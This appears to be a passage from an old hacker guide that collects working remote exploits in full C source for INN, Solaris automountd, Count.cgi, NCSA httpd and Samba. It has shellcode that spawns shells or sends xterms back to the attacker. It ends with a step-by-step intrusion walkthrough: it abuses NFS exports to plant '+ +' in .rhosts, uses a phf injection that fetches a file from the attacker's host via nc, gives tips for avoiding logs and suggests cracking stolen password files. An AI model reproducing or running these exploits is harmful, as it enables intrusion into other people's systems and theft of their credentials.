make_addr(char *name, struct in_addr *addr)
{
struct hostent *hp;
if(inet_aton(name, addr) == 0) {
if(!(hp = gethostbyname(name))) {
fprintf(stderr, "%s: ", me);
herror(name);
exit(1);
}
addr->s_addr = ((struct in_addr *)hp->h_addr)->s_addr;
}
}
char *bname(char *str)
{
char *cp;
if((cp = (char *)strrchr(str, '/')) != NULL)
return(++cp);
else
return(str);
}
void my_err(char *errstr, int err)
{
fprintf(stderr, "%s: ", me);
perror(errstr);
exit(err);
}
void usage()
{
printf(
"INN version 1.[45].x exploit by Method <method@arena.cwnet.com
>\n"
"Usage: %s <host> <filename>\n"
"Will start a shell on the remote host.\n"
"The second argument is the file containing the overflow data.\
n",
me);
exit(1);
}
select_loop(int netfd)
{
int ret, n, in = STDIN_FILENO, out = STDOUT_FILENO;
char buf[512];
fd_set rfds;
for( ; ; ) {
FD_ZERO(&rfds);
FD_SET(in, &rfds);
FD_SET(netfd, &rfds);
if((ret = select(netfd + 1, &rfds, NULL, NULL, NULL)) < 0)
my_err("select", 1);
if(!ret)
continue;
if(FD_ISSET(in, &rfds)) {
if((n = read(in, buf, sizeof(buf))) > 0)
write(netfd, buf, n);
}
if(FD_ISSET(netfd, &rfds)) {
if((n = read(netfd, buf, sizeof(buf))) > 0)
write(out, buf, n);
else
break;
}
}
}
int news_sock(char *host)
{
struct sockaddr_in sin;
int sock;
sin.sin_port = htons(119);
sin.sin_family = AF_INET;
make_addr(host, &(sin.sin_addr));
if((sock = socket(AF_INET, SOCK_STREAM, 0)) < 0)
my_err("socket", 1);
if(connect(sock, (struct sockaddr *)&sin, sizeof(sin)) < 0)
my_err("connect", 1);
return(sock);
}
void send_egg(int sk, char *file)
{
char buf[BUFSIZ];
int dfd;
int n;
if((dfd = open(file, O_RDONLY)) < 0)
my_err("open", 1);
printf("Executing innd exploit.. be patient.\n");
n = CHOMP(sk, buf);
buf[n] = '\0';
printf(buf);
SAY(sk, POST);
n = CHOMP(sk, buf);
buf[n] = '\0';
printf(buf);
sleep(2);
printf("Sending overflow data.\n");
while((n = CHOMP(dfd, buf)) > 0)
write(sk, buf, n);
sleep(2);
}
void main(int argc, char **argv)
{
char *victim, *filename;
int s;
me = basename(argv[0]);
if(argc != 3)
usage();
filename = argv[2];
send_egg(s = news_sock(victim = argv[1]), filename);
select_loop(s);
fprintf(stderr, "Connection closed.\n");
printf("Remember: Security is futile. Dweebs WILL own you.\n");
exit(0);
}
---------------------------------------------------------------------------
hehehehhahaha... kewl, huh ?
And there is automountd, for SunOs 5.5.1... :)
/*
this is really dumb automountd exploit, tested on solaris 2.5.1
./r blahblah /bin/chmod "777 /etc; 2nd cmd;3rd cmd" and so on,
map is executed via popen with key given as argument, read automount(1M)
patch 10465[45] fixes this
*/
#include <sys/types.h>
#include <sys/time.h>
#include <stdio.h>
#include <netdb.h>
#include <rpc/rpc.h>
#include <rpcsvc/autofs_prot.h>
#define AUTOTS "datagram_v" /* XXX */
void usage(char *s) {
printf("Usage: %s mountpoint map key [opts]\n", s);
exit(0);
}
bool_t
xdr_mntrequest(xdrs, objp)
register XDR *xdrs;
mntrequest *objp;
{
register long *buf;
if (!xdr_string(xdrs, &objp->name, A_MAXNAME))
return (FALSE);
if (!xdr_string(xdrs, &objp->map, A_MAXNAME))
return (FALSE);
if (!xdr_string(xdrs, &objp->opts, A_MAXOPTS))
return (FALSE);
if (!xdr_string(xdrs, &objp->path, A_MAXPATH))
return (FALSE);
return (TRUE);
}
bool_t
xdr_mntres(xdrs, objp)
register XDR *xdrs;
mntres *objp;
{
register long *buf;
if (!xdr_int(xdrs, &objp->status))
return (FALSE);
return (TRUE);
}
main(int argc, char *argv[]) {
char hostname[MAXHOSTNAMELEN];
CLIENT *cl;
enum clnt_stat stat;
struct timeval tm;
struct mntrequest req;
struct mntres result;
if (argc < 4)
usage(argv[0]);
req.path=argv[1];
req.map=argv[2];
req.name=argv[3];
req.opts=argv[4];
if (gethostname(hostname, sizeof(hostname)) == -1) {
perror("gethostname");
exit(0);
}
if ((cl=clnt_create(hostname, AUTOFS_PROG, AUTOFS_VERS, AUTOTS)) == NULL) {
clnt_pcreateerror("clnt_create");
exit(0);
}
tm.tv_sec=5;
tm.tv_usec=0;
stat=clnt_call(cl, AUTOFS_MOUNT, xdr_mntrequest, (char *)&req, xdr_mntres,
(char *)&result, tm);
if (stat != RPC_SUCCESS)
clnt_perror(cl, "mount call");
else
printf("mntres = %d.\n", result.status);
clnt_destroy(cl);
}
Now, this here is very very dangerous, it exploits the Count.Cgi, on the web
servers.. :)
/*
Count.cgi (wwwcount) linux test exploit
(c) 05/1997 by plaguez - dube0866@eurobretagne.fr
Contact me if you manage to improve this crap.
This program needs drastic changes to be useable.
If you can't understand how to modify it for your own purpose,
please do not consider trying it.
*/
#include <stdio.h>
#include <stdlib.h>
char shell[]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\x3c\x5e\x31\xc0\x89\xf1\x8d"
"\x5e\x18\x88\x46\x2c\x88\x46\x30"
"\x88\x46\x39\x88\x46\x4b\x8d\x56"
"\x20\x89\x16\x8d\x56\x2d\x89\x56"
"\x04\x8d\x56\x31\x89\x56\x08\x8d"
"\x56\x3a\x89\x56\x0c\x8d\x56\x10"
"\x89\x46\x10\xb0\x0b\xcd\x80\x31"
"\xdb\x89\xd8\x40\xcd\x80\xe8\xbf"
"\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff"
"/usr/X11R6/bin/xterm0-ut0-display0"
"127.000.000.001:00"
"\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff\xff\xff\xff\xff\xff"
"\xff\xff\xff";
/*
Assembly stuff for the previous buffer.
This basically implements an execve syscall, by creating
an array of char* (needs to put a null byte at the end of
all strings).
Here we gonna exec an xterm and send it to our host.
(you can't simply exec a shell due to the cgi proto).
jmp 60
popl %esi
xorl %eax,%eax # efface eax
movl %esi,%ecx # recupere l'adresse du buffer
leal 0x18(%esi),%ebx # recupere l'adresse des chaines
movb %al,0x2c(%esi) # cree les chaines azt
movb %al,0x30(%esi) #
movb %al,0x39(%esi)
movb %al,0x4b(%esi)
leal 0x20(%esi),%edx # cree le char**
movl %edx,(%esi)
leal 0x2d(%esi),%edx
movl %edx,0x4(%esi)
leal 0x31(%esi),%edx
movl %edx,0x8(%esi)
leal 0x3a(%esi),%edx
movl %edx,0xc(%esi)
leal 0x10(%esi),%edx
movl %eax,0x10(%esi)
movb $0xb,%al
int $0x80 # passe en mode kernel
xorl %ebx,%ebx # termine proprement (exit())
movl %ebx,%eax # si jamais le execve() foire.
inc %eax #
int $0x80 #
call -65 # retourne au popl en empilant l'adresse d
e la chaine
.byte 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff
.byte 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff
.byte 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff
.ascii \"/usr/X11R6/bin/xterm0\" # 44
.ascii \"-ut0\" # 48
.ascii \"-display0\" # 57 au ;
.ascii \"127.000.000.001:00\" # 75 (total des chaines)
.byte 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff
.byte 0xff,0xff,0xff,0xff,0xff,0xff,0xff,0xff
...
*/
char qs[7000];
char chaine[]="user=a";
unsigned long getesp() {
// asm("movl %esp,%eax");
return 0xbfffee38;
}
void main(int argc, char **argv) {
int compt;
long stack;
stack=getesp();
if(argc>1)
stack+=atoi(argv[1]);
for(compt=0;compt<4104;compt+=4) {
qs[compt+0] = stack & 0x000000ff;
qs[compt+1] = (stack & 0x0000ff00) >> 8;
qs[compt+2] = (stack & 0x00ff0000) >> 16;
qs[compt+3] = (stack & 0xff000000) >> 24;
}
strcpy(qs,chaine);
qs[strlen(chaine)]=0x90;
qs[4104]= stack&0x000000ff;
qs[4105]=(stack&0x0000ff00)>>8;
qs[4106]=(stack&0x00ff0000)>>16;
qs[4107]=(stack&0xff000000)>>24;
qs[4108]= stack&0x000000ff;
qs[4109]=(stack&0x0000ff00)>>8;
qs[4110]=(stack&0x00ff0000)>>16;
qs[4111]=(stack&0xff000000)>>24;
qs[4112]= stack&0x000000ff;
qs[4113]=(stack&0x0000ff00)>>8;
qs[4114]=(stack&0x00ff0000)>>16;
qs[4115]=(stack&0xff000000)>>24;
qs[4116]= stack&0x000000ff;
qs[4117]=(stack&0x0000ff00)>>8;
qs[4118]=(stack&0x00ff0000)>>16;
qs[4119]=(stack&0xff000000)>>24;
qs[4120]= stack&0x000000ff;
qs[4121]=(stack&0x0000ff00)>>8;
qs[4122]=(stack&0x00ff0000)>>16;
qs[4123]=(stack&0xff000000)>>24;
qs[4124]= stack&0x000000ff;
qs[4125]=(stack&0x0000ff00)>>8;
qs[4126]=(stack&0x00ff0000)>>16;
qs[4127]=(stack&0xff000000)>>24;
qs[4128]= stack&0x000000ff;
qs[4129]=(stack&0x0000ff00)>>8;
qs[4130]=(stack&0x00ff0000)>>16;
qs[4131]=(stack&0xff000000)>>24;
strcpy((char*)&qs[4132],shell);
/* Choose what to do here */
printf("GET /cgi-bin/Count.cgi?%s\n\n",qs);
/*fprintf(stderr,"\n\nadresse: %x0x\n",stack);
printf("GET /cgi-bin/Count.cgi?%s HTTP/1.0\nUser-Agent: %x\n\n",qs,stack);
setenv("QUERY_STRING",qs,1);
system("/usr/local/etc/httpd/cgi-bin/Count.cgi");
system("/bin/sh");*/
}
And of course, The HTTPD Exploit ... :)
/*
* NCSA 1.3 Linux/intel remote xploit by savage@apostols.org 1997-April-23
*
* Special THANKS to: b0fh,|r00t,eepr0m,moxx,Fr4wd,Kore,EDevil and the rest of
ToXyn !!!
*
* usage:
* $ (hackttpd 0; cat) | nc victim 143
* |
* +--> usually from -1000 to 1000 (try steeps of 100)
*/
#include <stdio.h>
unsigned char shell[] = {
'/',0x90,0x90,0x90,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,
0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90,0x90
,
0xeb,0x27,0x5e,0x31,0xed,0x31,0xc9,0x31,0xc0,0x88,0x6e,6,0x89,0xf3,0x89,0x76,
0x24,0x89,0x6e,0x28,0x8d,0x6e,0x24,0x89,0xe9,0x8d,0x6e,0x28,0x89,0xea,0xb0,0x0b
,
0xcd,0x80,0x31,0xdb,0x89,0xd8,0x40,0xcd,0x80,0xe8,0xd4,0xff,0xff,0xff,
'b','i','n','/','s','h'
};
char username[256+8];
void main(int argc, char *argv[]) {
int i,a;
long val;
if(argc>1)
a=atoi(argv[1]);
else
a=0;
strcpy(username,shell);
for(i=strlen(shell);i<sizeof(username);i++)
username[i]=0x90; /* NOP */
val = 0xbfff537c + 4 + a;
i=sizeof(username)-4;
{
username[i+0] = val & 0x000000ff;
username[i+1] = (val & 0x0000ff00) >> 8;
username[i+2] = (val & 0x00ff0000) >> 16;
username[i+3] = (val & 0xff000000) >> 24;
}
username[ sizeof(username) ] = 0;
printf("GET %s\n/bin/bash -i 2>&1;\n", username);
}
And, last but not least, the samba ExpLoit.. :)
/*
___ ______ _ _
/ \ | _ \ | \ / |
| / \ | | | \ | | \_/ |
| |___| | | |_ / | | \_/ |
| --- | | / | | | |
''' ''' ''''''' '''' ''''
CreW Presente For Y0uR plEaSure
Samba remote & LocaL buffer overflow!
found & exploited by some "blaireaux" and "mr3615phf" :))))))))))) <joke>
recursive greetz: ADM !
a special greetz to the ppl of the "offset effort" fr4wd,fratalG,and the rest
of t0xyn , and my friend [oO giemor Oo] <yes i have a sploit :)
,kod,theblade,reformed,m0sfet,kewl,oldmaster,owl,th0s
gigaacidbrutalhardcorebigextra greetz to da Beautiful: Heike <i'am in heIk3c0re
>.
big up to: da movement <stay cool ! >.
codeurz greetz going to: aleph1 <the guru its ALL !> & to samba team
<i love samba :) really !>
anal greetz: #banane suxxxxxxxxxxx Hotlame & Co <kill diz lamer>
------------------------------------------------------------------------------
explain of the bug: is really simple if your send a large passwd bha
your make a buffer overflow hahhahaha =) iam not good for explain go fuck !=))
--**JOKE**--
------------------------------------------------------------------------------
patch ?? WHAT U WANNA A PATCH ??? :))))
------------------------------------------------------------------------------
[SO..] we search the shellcode of other system (SUNos , solaris, etc)
and specialy SCO !
------------------------------------------------------------------------------
usage: first you must have a special smbclient for send a large large passwd
how ?? tell me for the bin of get the source of samba and change in smb.h
at line 248:
typedef char pstring[1024];
to
typedef char pstring[20000];
and now compile smbclient !
# make smbclient
[dont forget to edit the makefile !!]
see the line 199 in makefile
-------------------------------------------------------------------------------
mail 4 question, comments etc etc bla bla : admsmb@hotmail.com
-------------------------------------------------------------------------------
*/
/* Note i have include a little utility pinched from ADMtoolz
for get the netbios name
--------------------------------------------------------------------------
------------------------------[ADMnmbname.c]----------------------------------
-------------------------------------------------------------------------- *
/
#define DEFAULT_OFFSET 3500
#define DEFAULT_BUFFER_SIZE 3081
#define NOP 0x90
#define NMBHDRSIZE 13
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/wait.h>
#include <sys/ioctl.h>
#include <sys/stat.h>
#include <netdb.h>
#include <netinet/in.h>
#include <netinet/ip.h>
#include <netinet/ip_icmp.h>
#include <netinet/ip_tcp.h>
struct nmbhdr {
unsigned short int id;
unsigned char R:1;
unsigned char opcode:4;
unsigned char AA:1;
unsigned char TC:1;
unsigned char RD:1;
unsigned char RA:1;
unsigned char unless:2;
unsigned char B:1;
unsigned char RCODE:4;
unsigned short int que_num;
unsigned short int rep_num;
unsigned short int num_rr;
unsigned short int num_rrsup;
unsigned char namelen;
};
struct typez{
u_int type;
u_int type2;
};
unsigned int host2ip(char *serv)
{
struct sockaddr_in sin;
struct hostent *hent;
hent=gethostbyname(serv);
if(hent == NULL) return 0;
bzero((char *)&sin, sizeof(sin));
bcopy(hent->h_addr, (char *)&sin.sin_addr, hent->h_length);
return sin.sin_addr.s_addr;
}
main( int argc, char **argv)
{
struct sockaddr_in sin_me , sin_dst;
struct nmbhdr *nmb,*nmb2;
struct iphdr *ipz;
struct typez *typz;
struct hostent *hent;
int socket_client,sr,num,i=1,bha,timeout=0,try=0,GO=0;
int longueur=sizeof(struct sockaddr_in);
char *data;
char *dataz;
char buffer[1024];
char buffer2[1024];
char namezz[1024];
char name[64]="CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\0";
char c;
if(argc <2) {
printf("usage: ADMnmbname <ip of the victim>\n");
exit (0);
}
socket_client=socket(AF_INET,SOCK_DGRAM,17);
sr=socket(AF_INET,SOCK_RAW,17);
ioctl(sr,FIONBIO,&i);
sin_me.sin_family=AF_INET;
sin_me.sin_addr.s_addr=htonl(INADDR_ANY);
sin_me.sin_port=htons(2600);
sin_dst.sin_family=AF_INET;
sin_dst.sin_port=htons(137);
sin_dst.sin_addr.s_addr = host2ip(argv[1]);
nmb = (struct nmbhdr *) buffer;
data = (char *)(buffer+NMBHDRSIZE);
typz = (struct typez *)(buffer+NMBHDRSIZE+33);
nmb2 = (struct nmbhdr *)(buffer2+20+8);
ipz = (struct iphdr *)buffer2;
dataz = (char *)(buffer2+50+7+20+8);
memset(buffer,0,1024);
memset(buffer2,0,1024);
memset(namezz,0,1024);
memcpy(data,name,33);
/* play with the netbios query format :) */
nmb->id=0x003;
nmb->R=0; /* 0 for question 1 for response */
nmb->opcode=0; /* 0 = query */
nmb->que_num=htons(1); /* i have only 1 question :) */
nmb->namelen=0x20;
typz->type=0x2100;
typz->type2=0x1000;
sendto(socket_client,buffer,50,0,(struct sockaddr *)&sin_dst,longueur);
for(timeout=0;timeout<90;timeout++ )
{
usleep(100000);
buffer2[0]='0';
recvfrom(sr,buffer2,800,0,(struct sockaddr *)&sin_dst,&(int)longueur
);
if(buffer2[0]!='0')
{
if(nmb2->rep_num!=0)
{
bha=0;
for(;;)
{
c=*(dataz+bha);
if(c!='\x20')
{
namezz[bha]=c;
bha++;
}
if(c=='\x20')break;
}
printf("netbios name of %s is %s\n",argv[1],nam
ezz);
try =4;
GO = 4;
break;
}
}
}
memset(buffer,0,1024);
memset(buffer2,0,1024);
}
/*
---------------------------------------------------------------------------
----------------------------[ADMkillsamba.c]---------------------------------
---------------------------------------------------------------------------
generic buffer overflow ameliored for samba sploit
the sploit send a xterm to your machine .
hey dont forget to do a xhost +IP-OF-VICTIM !!!!
and put the the sploit to the same directory of the special smbclient !
*/
/* diz default offset and buffer size Work fine on a my system Redhat 4.2 with
samba server
1.9.17alpha5 < the last version !> i have tested on other system with this deff
autl buff & size
smb 1.9.16p[9-11] the default srv on redhat 4.1 4.2 but somtime you need to ch
ange the
buffer size and offset try a buffer of ( 1050<buffer >1100) and a offset ( 15
00<off >2500)
mail me at admsmb@hotmail.com if u wanna some help */
#define DEFAULT_OFFSET 3500
#define DEFAULT_BUFFER_SIZE 3081
#define NOP 0x90
#include <stdlib.h>
#include <strings.h>
unsigned char shellcode[500] =
"\xeb\x2f\x5f\xeb\x4a\x5e\x89\xfb\x89\x3e\x89\xf2\xb0\xfe\xae\x74"
"\x14\x46\x46\x46\x46\x4f\x31\xc9\x49\xb0\xff\xf2\xae\x30\xc0\x4f"
"\xaa\x89\x3e\xeb\xe7\x31\xc0\x89\x06\x89\xd1\x31\xd2\xb0\x0b\xcd"
"\x80\xe8\xcc\xff\xff\xff";
unsigned long get_sp(void) {
__asm__("movl %esp,%eax");
}
void main(int argc, char *argv[]) {
char *buff, *ptr;
long *addr_ptr, addr;
int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;
char netbios_name[100];
char bufferz[255];
char ipz[40];
char myipz[40];
unsigned char bla[50] = "\xfe\xe8\xb1\xff\xff\xff";
int *ret;
unsigned char cmd[50]="/usr/bin/X11/xterm\xff-display\xff";
unsigned char arg1[50];
char arg2[50]="bhahah\xff";
int i,pid;
bzero(netbios_name,100);
bzero(bufferz,255);
bzero(ipz,40);
bzero(ipz,40);
if(argc <4){
printf(" usage: ADMkillsamba <ip of the victim> <netbios name> <your ip> [buf
f size] [offset size]\n");
printf("<ip of victim> = 11.11.11.11 ! THe numerical IP Only ! not www.xxx.
cc !\n");
printf("<netbios name> = VICTIME for get the netbios name use ADMnmbname o
r ADMhack\n");
printf("<your ip> = the sploit send a xterm to your machine heh \n");
printf("option:\n");
printf("[buff size] = the size of the buffer to send default is 3081 try +1 -
1 to a plage of +10 -10\n");
printf("[offset size] = the size of the offset default is 3500 try +50 -50 to
a plage of 1000 -1000\n");
printf(" HaVe Fun\n");
exit(0);
}
sprintf(arg1,"%s:0\xff-e\xff/bin/sh\xff",argv[3]);
shellcode[4] =(unsigned char)0x32+strlen(cmd)+strlen(arg1);
bla[2] =(unsigned char) 0xc9-strlen(cmd)-strlen(arg1);
printf("4 byte = 0x%x\n",shellcode[4]);
printf("5 byte = 0x%x\n",bla[2]);
strcat(shellcode,cmd);
strcat(shellcode,arg1);
strcat(shellcode,bla);
strcat(shellcode,"xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
xxxxxxxxxxxxx");
// printf("%s\n",shellcode);
strcpy(ipz,argv[1]); /* haha u can overflow my sploit :) */
strcpy(netbios_name,argv[2]);
if (argc > 4) bsize = atoi(argv[4]);
if (argc > 5) offset = atoi(argv[5]);
if (!(buff = malloc(bsize))) {
printf("Can't allocate memory.\n");
exit(0);
}
sprintf(bufferz,"\\\\\\\\%s\\\\IPC$",netbios_name);
addr = 0xbffffff0 - offset ;
printf("Using address: 0x%x\n", addr);
ptr = buff;
addr_ptr = (long *) ptr;
for (i = 0; i < bsize; i+=4)
*(addr_ptr++) = addr;
for (i = 0; i < bsize/4; i++)
buff[i] = NOP;
ptr = buff + ((bsize/4) - (strlen(shellcode)/2));
for (i = 0; i < strlen(shellcode); i++)
*(ptr++) = shellcode[i];
buff[bsize - 1] = '\0';
execl("./smbclient","smbclient",bufferz,buff,"-I",ipz,NULL);
}
------------------------------------------[END]--------------------------------
-----------------
Now, dont you wish you had samba ?????????? :)
Well, this about covers most of it, but it covers only the exploit part...
For the rest, i use my very very old guide, to explain the nfs problems &&
phf.. bcoz i got tired of writting... sooooooooooooo ... here it is.. :)
<snif>
The first thing I do is see if the system has an export list:
mysite:~>/usr/sbin/showmount -e victim.site.com
RPC: Program not registered.
If it gives a message like this one, then it's time to search another way
in.
What I was trying to do was to exploit an old security problem by most
SUN OS's that could allow an remote attacker to add a .rhosts to a users
home directory... (That was possible if the site had mounted their home
directory.
Let's see what happens...
mysite:~>/usr/sbin/showmount -e victim1.site.com
/usr victim2.site.com
/home (everyone)
/cdrom (everyone)
mysite:~>mkdir /tmp/mount
mysite:~>/bin/mount -nt nfs victim1.site.com:/home /tmp/mount/
mysite:~>ls -sal /tmp/mount
total 9
1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./
1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../
1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/
1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/
1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42 john/
1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 paul/
1 -rw------- 1 root root 242 Mar 9 1997 sudoers
1 drwx------ 3 test 100 1024 Oct 8 21:05 test/
1 drwx------ 15 102 100 1024 Oct 20 18:57 rapper/
Well, we wanna hack into rapper's home.
mysite:~#id
uid=0 euid=0
mysite:~#whoami
root
mysite:~#echo "rapper::102:2::/tmp/mount:/bin/csh" >> /etc/passwd
We use /bin/csh because bash usually leaves a (Damn!) .bash_history and you
might forget it on the remote server...
mysite:~>su - rapper
Welcome to rapper's user.
mysite:~>ls -lsa /tmp/mount/
total 9
1 drwxrwxr-x 8 root root 1024 Jul 4 20:34 ./
1 drwxr-xr-x 19 root root 1024 Oct 8 13:42 ../
1 drwxr-xr-x 3 at1 users 1024 Jun 22 19:18 at1/
1 dr-xr-xr-x 8 ftp wheel 1024 Jul 12 14:20 ftp/
1 drwxrx-r-x 3 john 100 1024 Jul 6 13:42 john/
1 drwxrx-r-x 3 139 100 1024 Sep 15 12:24 paul/
1 -rw------- 1 root root 242 Mar 9 1997 sudoers *snifsnif*
1 drwx------ 3 test 100 1024 Oct 8 21:05 test/
1 drwx------ 15 rapper daemon 1024 Oct 20 18:57 rapper/
So we own this guy's home directory...
mysite:~>echo "+ +" > rapper/.rhosts
mysite:~>cd /
mysite:~>rlogin victim1.site.com
Welcome to Victim.Site.Com.
SunOs ver....(crap).
victim1:~$
Well, now be very carefull with the web exploits, because they usually get
logged. (not usually, always.. :))
Besides, if you really wanna get a source file from /cgi-bin/ use this
sintax : lynx http://www.victim1.com//cgi-bin/finger...
that should work on some systems.. :)
If you don't wanna do that, then do a :
mysite:~>echo "+ +" > /tmp/rhosts
mysite:~>echo "GET /cgi-bin/phf?Qalias=x%0arcp+phantom@mysite.com:/tmp/rhosts+
/root/.rhosts" | nc -v - 20 victim1.site.com 80
mysite:~>rlogin -l root victim1.site.com
Welcome to Victim1.Site.Com.
victim1:~#
or instead of rcp-ing, try catt-ing the /etc/passwd file, and then cracking
it, to get passwords...
And so on......